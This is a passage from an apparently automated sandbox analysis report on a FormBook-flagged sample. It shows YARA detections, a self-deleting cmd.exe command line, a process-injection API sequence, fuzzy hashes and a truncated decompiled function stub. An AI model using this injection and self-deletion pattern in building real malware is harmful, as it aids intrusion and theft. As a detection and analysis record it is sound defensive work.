                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate

                                          General

                                          Start time:06:29:15
                                          Start date:12/05/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del 'C:\Users\user\Desktop\ox87DNNM8d.exe'
                                          Imagebase:0xf60000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:06:29:15
                                          Start date:12/05/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7ecfc0000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Disassembly

                                          Code Analysis


                                            Execution Graph

                                            Execution Coverage:10.1%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:2.8%
                                            Total number of Nodes:106
                                            Total number of Limit Nodes:7

                                            Graph


                                            Executed Functions

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: X) X$X) X
                                            • API String ID: 0-462033721
                                            • Opcode ID: f9a393cda20f8eec8e0cc08dbbd58076bb0e722d36ab27e575613ee0305ca19c
                                            • Instruction ID: 47c0aab7782d02018097d5e57db074d7d98e1174768f468ae9760e685a85d095
                                            • Opcode Fuzzy Hash: f9a393cda20f8eec8e0cc08dbbd58076bb0e722d36ab27e575613ee0305ca19c
                                            • Instruction Fuzzy Hash: 75617A70E0421A8FDB44CFEAC5416EEFBF2BF89310F60D42AD524A7254D73499868FA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 01606B10
                                            • GetCurrentThread.KERNEL32 ref: 01606B4D
                                            • GetCurrentProcess.KERNEL32 ref: 01606B8A
                                            • GetCurrentThreadId.KERNEL32 ref: 01606BE3
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: e40aca58c22c667757819a8ea8ac4e4a803f65dc2e3b87fc8fc37c1c0f2635ad
                                            • Instruction ID: f4697bcfc6d18ba649d2f2ad4be07916775c016e26275e934684d8f00f8b70c9
                                            • Opcode Fuzzy Hash: e40aca58c22c667757819a8ea8ac4e4a803f65dc2e3b87fc8fc37c1c0f2635ad
                                            • Instruction Fuzzy Hash: EC5156B49007898FDB19CFA9D948BEEBBF0FF48318F14805AE019A7394DB745844CB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 01606B10
                                            • GetCurrentThread.KERNEL32 ref: 01606B4D
                                            • GetCurrentProcess.KERNEL32 ref: 01606B8A
                                            • GetCurrentThreadId.KERNEL32 ref: 01606BE3
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: f91fd100d46866e90ea6de16468e58c34cd239e912805edca50dfafca41023f8
                                            • Instruction ID: 2c1db9127b3775b69a81386cad2d5254994cc981bb8d14a3f82d73796b296265
                                            • Opcode Fuzzy Hash: f91fd100d46866e90ea6de16468e58c34cd239e912805edca50dfafca41023f8
                                            • Instruction Fuzzy Hash: C85144B49006898FDB18CFA9D948B9EBBF4FF48318F248459E419B7394DB34A844CB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0642B1F6
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 19a4128074cd66b7e1051dff1c6820a346736feeb860c4c7493a49d1d3903306
                                            • Instruction ID: 0825c999c9db03e4d5f6df56f9336295a637847ecffeed1ee0a8fc0d8b325c85
                                            • Opcode Fuzzy Hash: 19a4128074cd66b7e1051dff1c6820a346736feeb860c4c7493a49d1d3903306
                                            • Instruction Fuzzy Hash: 62918C71D0022A8FDB51CF64C9817EEBBB2FF44318F54856AE818A7380DB749985CF91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0160BD2E
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 5e0460eb46779e5cf4c0ed44cb90a214f9ae5815767bb21f345169d493fcfb96
                                            • Instruction ID: d8031d7d9fd936177916abbde2ed5581809ed74aa32b141938ee38e3a3c6ba73
                                            • Opcode Fuzzy Hash: 5e0460eb46779e5cf4c0ed44cb90a214f9ae5815767bb21f345169d493fcfb96
                                            • Instruction Fuzzy Hash: FF713370A00B058FD729DF69D85075BBBF1BF88204F00892ED546D7B94DB74E8458F91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0160DCAA
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 69659a65db828e2febacdfa1b45185b25edb6b07bb07fb6e14c144f216078ef9
                                            • Instruction ID: cc6ebc9272f88c0d487b3fab803d14b97bcfa625af70fec6ad7b1d9c8d5b2116
                                            • Opcode Fuzzy Hash: 69659a65db828e2febacdfa1b45185b25edb6b07bb07fb6e14c144f216078ef9
                                            • Instruction Fuzzy Hash: 3851DFB1D003489FDB15CFD9D884ADEBBB5BF88314F24822AE819AB250D7709885CF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0160DCAA
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: fa0df80a86349e8aebf4c407888c07fd645ec62635bcbfcb8ba1dec627ae22ad
                                            • Instruction ID: fc7718fa8c41a4a5e3d4936b3f27780c59009973db57c6f99c1a1c461d12f803
                                            • Opcode Fuzzy Hash: fa0df80a86349e8aebf4c407888c07fd645ec62635bcbfcb8ba1dec627ae22ad
                                            • Instruction Fuzzy Hash: 9441CFB1D003489FDB15CFD9D984ADEBBB5BF88314F24822AE819AB250D7749885CF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0642A9C8
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 0f9893c52533c89deb4360d1348e87160cfa95080d6b8236c5b7e0e38b2cff4c
                                            • Instruction ID: 148c71f385a1cc2bb68a00938fe1904521e8f3685f5822fb51c2df9c3d7173bf
                                            • Opcode Fuzzy Hash: 0f9893c52533c89deb4360d1348e87160cfa95080d6b8236c5b7e0e38b2cff4c
                                            • Instruction Fuzzy Hash: AF214671900359DFCB00CFAAC880BEEBBF5FF48314F51882AE958A7240D7789954DBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0642AEA8
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 3d4b7b50eea70d657a041111ad7edefc15110fc517d52f1e51dc0cdd9e97486c
                                            • Instruction ID: 74fa00dd2d2c508afcdeabaafad089bde50ba05c5dfdb90c8a564e6e538c1e6d
                                            • Opcode Fuzzy Hash: 3d4b7b50eea70d657a041111ad7edefc15110fc517d52f1e51dc0cdd9e97486c
                                            • Instruction Fuzzy Hash: 4C212571D003599FCB10CFAAC884AEEFBF5FF48314F51842AE918A7250D7389945DBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetThreadContext.KERNELBASE(?,00000000), ref: 0642A81E
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID: ContextThread
                                            • String ID:
                                            • API String ID: 1591575202-0
                                            • Opcode ID: cb5cd3861a87cf54b99c574a8f234059b0109a3278b5184d3a338699029f12bc
                                            • Instruction ID: c5f2706027be564e5bee02a4ccbbc093068778e03cffa4ede03412158817555e
                                            • Opcode Fuzzy Hash: cb5cd3861a87cf54b99c574a8f234059b0109a3278b5184d3a338699029f12bc
                                            • Instruction Fuzzy Hash: 51213771D003598FCB10CFAAC4847EEBBF4AF88314F54842AD959A7240DB78A985CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01606D5F
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 23f63d47899e2ba754f7a4899efc6670957db39496f4baf2f10098ae76b516b4
                                            • Instruction ID: 61bfbb4365ee89081027362d810dfcff2fb1d6a0ef3bf6d11a3501f1b7b64fa4
                                            • Opcode Fuzzy Hash: 23f63d47899e2ba754f7a4899efc6670957db39496f4baf2f10098ae76b516b4
                                            • Instruction Fuzzy Hash: 0A21E0B59002489FDB10CFA9D984ADEBBF4FF48324F14841AE954B7350D374A954DF61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01606D5F
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 49785aa3cdca9e2b8cc61716572efa85b69848ea3fb44b860b49b66f79b2da2a
                                            • Instruction ID: c0a4e8c338c298b4a4093fdf4c38f6581b6d28cf6741f8707ad0f986b11e5119
                                            • Opcode Fuzzy Hash: 49785aa3cdca9e2b8cc61716572efa85b69848ea3fb44b860b49b66f79b2da2a
                                            • Instruction Fuzzy Hash: 2221C2B5900248AFDB10CFA9D984ADEBBF8FB48324F14841AE954A3350D774A954DFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06426A73
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 109de91656269b50aba8831a2c560e9978d6abe752d1f8898b8965ccf9fcc5e2
                                            • Instruction ID: 7feee91176e8addf2c63bd9bf09e71eef3c9690adea20658ebd496c6353fb1e6
                                            • Opcode Fuzzy Hash: 109de91656269b50aba8831a2c560e9978d6abe752d1f8898b8965ccf9fcc5e2
                                            • Instruction Fuzzy Hash: FC2114B1D002599FCB10CF9AC884BDEFBF4FB48320F11802AE458A7250D778A544DFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0160BDA9,00000800,00000000,00000000), ref: 0160BFBA
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 73b54ff53b16e69314e76cd3b0fce784c908215b0d8ce47f78d628e7565636c0
                                            • Instruction ID: df7eb38f853d74916342271145d860e086b091bf031d610422ab5e0e41db777a
                                            • Opcode Fuzzy Hash: 73b54ff53b16e69314e76cd3b0fce784c908215b0d8ce47f78d628e7565636c0
                                            • Instruction Fuzzy Hash: A211FFB69042488FDB14CFAAD844A9FFBF4EB88320F04842EE519A7240C775A945CFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0642A8E6
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: b6803457b14f3c68259c9decadc288ab030d0467f9981959f519dc4165d864c2
                                            • Instruction ID: f90efb8bc194fec9362f3b49ff04224a7077bd5d468dd3284d2ee5bc4c82905c
                                            • Opcode Fuzzy Hash: b6803457b14f3c68259c9decadc288ab030d0467f9981959f519dc4165d864c2
                                            • Instruction Fuzzy Hash: 661126719002899BCB10DFA9D844ADFBBF5EF48324F14841AE519A7250C775A944DFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0160BDA9,00000800,00000000,00000000), ref: 0160BFBA
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 4a7ab86d598a37cf4f0fee67ab7815296d7da800610528003ccde7d998b4d084
                                            • Instruction ID: f031bcc4a3e9400b658c7130a8ddd825de11fd30a2e4ae83bab1b28543649f89
                                            • Opcode Fuzzy Hash: 4a7ab86d598a37cf4f0fee67ab7815296d7da800610528003ccde7d998b4d084
                                            • Instruction Fuzzy Hash: 3A1100B69002498FDB15CFAAD944B9EFBF4EB48314F14841EE519B7250C379A545CFA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 13b6684b232471d7c54723f367f929ddaa7f5289fcee86a07634176dfef61cbc
                                            • Instruction ID: d0c316a99e3297e762711da4a3fc9ded8e21b23ebfe7a5204c7e4e53ee5513ce
                                            • Opcode Fuzzy Hash: 13b6684b232471d7c54723f367f929ddaa7f5289fcee86a07634176dfef61cbc
                                            • Instruction Fuzzy Hash: DD112571D003598BCB10DFAAC4447EEFBF4AB88324F25841AD519A7340DB74A944CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetWindowLongW.USER32(?,?,?), ref: 0160DE3D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID: LongWindow
                                            • String ID:
                                            • API String ID: 1378638983-0
                                            • Opcode ID: 992d5d9953946d828ebd04ae81a8e7d9d2345b20bad199dc92b1e0aa2d82504b
                                            • Instruction ID: 0d104ebc650195b5a7d8866abd813a40f7c37e63a9361d9d1c4784987a4369ad
                                            • Opcode Fuzzy Hash: 992d5d9953946d828ebd04ae81a8e7d9d2345b20bad199dc92b1e0aa2d82504b
                                            • Instruction Fuzzy Hash: A811F5B59003499FDB10CF99D489BDFBBF8EB48324F14851AE954A7340C374A945CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0642E67D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 7812797c9140887b48576a4459bdad710b9766386f488ad134e5e1dae1756941
                                            • Instruction ID: 418728e5fbea99852b7995c10dac5db63943bea5365b84512a711ef2aefb8284
                                            • Opcode Fuzzy Hash: 7812797c9140887b48576a4459bdad710b9766386f488ad134e5e1dae1756941
                                            • Instruction Fuzzy Hash: 0C11F2B58003599FDB50CF99D884BDFBBF8EB48320F54841AE959A7200C374A944CFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 0642FA40
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID: ChangeCloseFindNotification
                                            • String ID:
                                            • API String ID: 2591292051-0
                                            • Opcode ID: 9b0d99978785e20ffb0a9fb3b2bda3a9b54051adc395393093d8ba75954c101b
                                            • Instruction ID: 4523cf7e2247d9142257bf885dee47fe89fbd0fd91062d0dcba8a9d10ce7e1f5
                                            • Opcode Fuzzy Hash: 9b0d99978785e20ffb0a9fb3b2bda3a9b54051adc395393093d8ba75954c101b
                                            • Instruction Fuzzy Hash: E91103B1C003598FCB50CF99D444BDEBBF4EB48324F55841AE558A7740D738A548CFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0160BD2E
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: ed1fee129e1a9b7820e9894f1b32440c65b33f67ff50f9906aca10a5e5518f0e
                                            • Instruction ID: a695390805eb1f7809256c5d093052b9979af20eacc9c08551cd2bd49db490d9
                                            • Opcode Fuzzy Hash: ed1fee129e1a9b7820e9894f1b32440c65b33f67ff50f9906aca10a5e5518f0e
                                            • Instruction Fuzzy Hash: B511FDB6C002498BDB14CF9AD844B9EFBF4AB88224F14841AD419A7240C374A545CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetWindowLongW.USER32(?,?,?), ref: 0160DE3D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID: LongWindow
                                            • String ID:
                                            • API String ID: 1378638983-0
                                            • Opcode ID: e53c0940aa700f0dad30a681200ec0476b2e8778ab381067e989e71a25f8b3ce
                                            • Instruction ID: 91cbf40823288c96b4bbf47f2f34e308a01c67db6851f0c0d55b51e46fa230dd
                                            • Opcode Fuzzy Hash: e53c0940aa700f0dad30a681200ec0476b2e8778ab381067e989e71a25f8b3ce
                                            • Instruction Fuzzy Hash: 3111D0B59003499FDB10CF99D888BDFBBF8EB48324F14851AE959A7340C374A944CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.233696009.00000000011ED000.00000040.00000001.sdmp, Offset: 011ED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_11ed000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eea440e38f7f8068045d3db2c14062930a2559ebdaad81d9684bb413fee34cf1
                                            • Instruction ID: 9c83f363d44a04de03e7f5f24b3392b187aa81b63bd231df14a1fbecf459c478
                                            • Opcode Fuzzy Hash: eea440e38f7f8068045d3db2c14062930a2559ebdaad81d9684bb413fee34cf1
                                            • Instruction Fuzzy Hash: 132106B1504644DFDF09CF94E9C8B2ABBB5FF88328F258569E9054B206C336D845CBA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.233707232.00000000011FD000.00000040.00000001.sdmp, Offset: 011FD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_11fd000_ox87DNNM8d.jbxd
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.233707232.00000000011FD000.00000040.00000001.sdmp, Offset: 011FD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_11fd000_ox87DNNM8d.jbxd
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.233696009.00000000011ED000.00000040.00000001.sdmp, Offset: 011ED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_11ed000_ox87DNNM8d.jbxd
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.233696009.00000000011ED000.00000040.00000001.sdmp, Offset: 011ED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_11ed000_ox87DNNM8d.jbxd
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.233696009.00000000011ED000.00000040.00000001.sdmp, Offset: 011ED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_11ed000_ox87DNNM8d.jbxd
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.233109225.0000000000B52000.00000002.00020000.sdmp, Offset: 00B50000, based on PE: true
                                            • Associated: 00000001.00000002.233091224.0000000000B50000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.233268341.0000000000C08000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_b50000_ox87DNNM8d.jbxd
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 66%
                                            			E00B58782(void* __eax, signed char __ebx, signed int __ecx, signed char __edx, signed int* __edi, signed int __esi, void* __fp0) {
                                            				signed int _t669;
                                            				signed char _t670;
                                            				signed char _t671;
                                            				signed char _t672;
                                            				signed char _t673;
                                            				signed char _t674;
                                            				signed char _t675;
                                            				intOrPtr* _t676;
                                            				intOrPtr* _t677;
                                            				signed char* _t678;
                                            				signed char _t679;
                                            				signed char _t680;
                                            				signed int _t683;
                                            				signed char _t684;
                                            				signed char _t685;
                                            				signed char _t689;
                                            				signed char _t690;
                                            				signed char _t693;
                                            				signed int _t694;
                                            				signed char _t695;
                                            				signed char _t696;
                                            				intOrPtr* _t698;
                                            				intOrPtr* _t699;
                                            				signed char _t700;
                                            				intOrPtr* _t701;
                                            				signed char _t702;
                                            				signed char _t703;
                                            				signed char _t705;
                                            				signed char _t706;
                                            				signed char _t707;
                                            				signed char _t709;
                                            				signed char _t710;
                                            				signed char _t711;
                                            				signed char _t712;
                                            				signed char _t713;
                                            				signed char _t714;
                                            				signed char _t715;
                                            				signed char _t716;
                                            				signed char _t717;
                                            				signed char _t718;
                                            				signed char _t719;
                                            				signed char _t720;
                                            				signed char _t721;
                                            				signed char _t722;
                                            				signed char _t723;
                                            				signed char _t724;
                                            				signed char _t725;
                                            				signed char _t726;
                                            				signed char _t727;
                                            				signed char _t732;
                                            				signed char _t733;
                                            				signed char _t734;
                                            				signed char _t735;
                                            				signed char _t736;
                                            				signed char _t737;
                                            				signed char _t738;
                                            				signed char _t739;
                                            				signed char _t741;
                                            				signed char _t742;
                                            				signed char _t743;
                                            				signed char _t745;
                                            				intOrPtr* _t746;
                                            				signed char _t748;
                                            				intOrPtr* _t749;
                                            				signed char _t751;
                                            				intOrPtr* _t752;
                                            				signed int _t753;
                                            				intOrPtr* _t754;
                                            				intOrPtr* _t756;
                                            				intOrPtr* _t757;
                                            				signed int* _t758;
                                            				signed char _t759;
                                            				signed char _t760;
                                            				signed char _t761;
                                            				signed char _t762;
                                            				intOrPtr* _t763;
                                            				signed char _t1065;
                                            				signed char _t1066;
                                            				intOrPtr* _t1068;
                                            				signed char _t1073;
                                            				signed char _t1074;
                                            				signed char _t1075;
                                            				signed char _t1076;
                                            				signed char _t1077;
                                            				signed char _t1078;
                                            				signed char _t1079;
                                            				signed char _t1080;
                                            				signed char _t1081;
                                            				signed char _t1082;
                                            				signed char _t1083;
                                            				signed char _t1084;
                                            				signed char _t1085;
                                            				intOrPtr* _t1086;
                                            				signed char _t1087;
                                            				signed char _t1088;
                                            				intOrPtr* _t1090;
                                            				signed char _t1091;
                                            				signed char _t1092;
                                            				signed char _t1093;
                                            				void* _t1095;
                                            				void* _t1096;
                                            				void* _t1097;
                                            				signed char _t1098;
                                            				intOrPtr* _t1129;
                                            				signed char _t1131;
                                            				signed char _t1132;
                                            				signed char _t1133;
                                            				signed char _t1136;
                                            				signed char _t1137;
                                            				signed char _t1139;
                                            				signed char _t1141;
                                            				signed char _t1145;
                                            				signed char _t1146;
                                            				signed char _t1155;
                                            				signed char _t1158;
                                            				signed char _t1160;
                                            				signed char _t1161;
                                            				signed char _t1162;
                                            				signed char _t1163;
                                            				signed char _t1164;
                                            				void* _t1281;
                                            				void* _t1282;
                                            				void* _t1283;
                                            				signed char _t1284;
                                            				signed char _t1285;
